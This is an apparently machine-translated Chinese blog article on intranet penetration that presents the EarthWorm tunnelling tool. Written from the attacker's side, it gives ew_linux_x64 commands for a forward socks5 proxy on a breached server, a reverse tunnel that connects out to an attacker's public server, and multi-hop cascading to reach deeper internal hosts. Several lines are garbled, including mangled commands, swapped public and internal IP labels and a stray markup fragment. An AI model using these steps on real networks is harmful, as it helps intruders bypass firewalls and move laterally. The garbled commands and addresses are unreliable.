首页 > 编程知识 正文

安全是一个永恒的话题(没有安全就没有一切)

时间:2023-05-04 14:44:21 阅读:82409 作者:4588

一、内部网穿透原理

1、什么是内部网透过

内网穿透是指利用各种隧道技术,通过网络防火墙允许的协议,绕过网络防火墙的阻塞,实现对被阻塞的目标网络的访问。

2、内部网穿透的原理

网络地址转换(NAT )是1994年提出的。 如果专用网络中的一些主机已经分配了本地IP地址(即,仅在此专用网络中使用的专用地址),但希望与互联网上的主机进行通信,请使用NAT方法。 不需要加密。

此方法要求在连接到专用网络(专用网络IP )为internet的公共网络IP )的路由器上安装NAT软件。 安装了NAT软件的路由器称为NAT路由器,至少具有一个有效的外部全局IP地址(公共IP地址)。

因此,所有使用本地地址(专用网络IP地址)的主机在与外部通信时,必须通过NAT路由器将其本地地址转换为全局IP地址,才能连接到互联网。

二、EarthWorm的介绍

EarthWorm是一种轻量级、便携、功能强大的网络透明工具,基于标准c开发,具有socks5代理、端口转发和端口映射三大功能。 与其他透明工具(如reGeorg )相比,EarthWorm在不需要板载机的情况下运行web服务,并具有多种功能(如Linux、Windows、MacOS和ArmLinux ),同时穿透更复杂的内部网环境

根据官方文档,EarthWorm通过“正向连接”、“反向连接”、“多级级联”等方法打通网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,防火墙

三、EarthWorm内部网贯通姿态

机器资源

攻击者设备

可以访问互联网

公共服务器

企业内部网IP 172.16.32.5

公共网络IP 159.75.220.19

企业内部网服务器1

企业内部网IP 106.52.204.56

公共IP 172.16.16.2

内部网2

企业内部网IP 172.16.16.6

内部网3

企业内部网IP 172.16.16.17

1、使用正向代理

攻击者在外网时,不能直接访问目标网络内部的主机,但可以访问目标网络内对外提供服务的主机。 但是,碰巧该主机也有内部网IP地址,有公用网IP,可以访问其他内部网设备。

1 )攻击者将EW上载到内部网服务器1,并执行以下命令,在1080端口上启动socks5代理。

chmod xew行64

./ew _ Linux _ x64-s套接字- l 1080

2 )攻击者用自己的攻击机使用浏览器插件SwitchyOmega进行socks5代理

连接到内部网服务器1的公共IP1080端口

3 )攻击者可以通过浏览器访问内部网2上的Web业务

om=pc">

4)攻击者可以使用SSTap进行全局代理,这样可以使御剑等扫描软件的流量代理到企业内网

2、反向代理

攻击者位于外网,且无法访问目标网络内部的主机,但是内部网络中存在一台对互联网提供服务的主机(无公网IP),而且还可以访问到其他内网机器。

1)攻击者可以在公网服务器1上运行EW监听8888端口,然后将流量转发到1080端口。

chmod +x ew_linux_x64 ./ew_linux_x64 -s rcsocks -l 1080 -e 8888

2)攻击者在内网服务器1上使用Ew进行反向代理,将流量反弹到公网服务器的8888端口。

./ew_linux_x64 -s rssocks -d 159.75.220.19 -e 8888

3)攻击者可以在攻击机上通过浏览器代理访问到内网服务器3上的Web业务。

3、多级连接

如果攻击者位于外网,无法访问目标网络内部的主机,但攻击者可以访问目标网络中对外提供服务的内网服务器1(无公网IP),同时还存在一台被控内网服务器2可以访问到其他内网机器(无公网IP)。

1)在公网服务器上执行以下命令,监听8888端口然后将流量转发到1080端口

chmod +x ew_linux_x64 ./ew_linux_x64 -s rcsocks -l 1080 -e 8888

2)在内网服务器1上执行以下命令,主动连接内网服务器2的9999端口并将流量转发到公网服务器的8888端口。

./ew_linux_x64 -s lcx_slave -d 159.75.220.19 -e 8888 -f 172.16.16.6 -g 9999

3)在内网服务器2上执行以下命令,在9999端口上开启sockes5代理

./ew_linux_x64 -s ssocksd -l 9999

4)攻击者通过代理去访问内网服务器3的web业务

5)在内网服务器3上查看是内网服务器2在请求80端口

转发指令

工具中自带的三条端口转发指令,它们的参数格式分别为:

./ew_linux_x64 -slcx_listen -l 1080 -e 8888 ./ew_linux_x64 -s lcx_tran-l 1080 -f 2.2.2.2 -g 9999 ./ew_linux_x64 -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.2 -g 9999

通过这些端口转发指令可以将处于网络深层的基于TCP的服务转发至根前。

版权声明:该文观点仅代表作者本人。处理文章:请发送邮件至 三1五14八八95#扣扣.com 举报,一经查实,本站将立刻删除。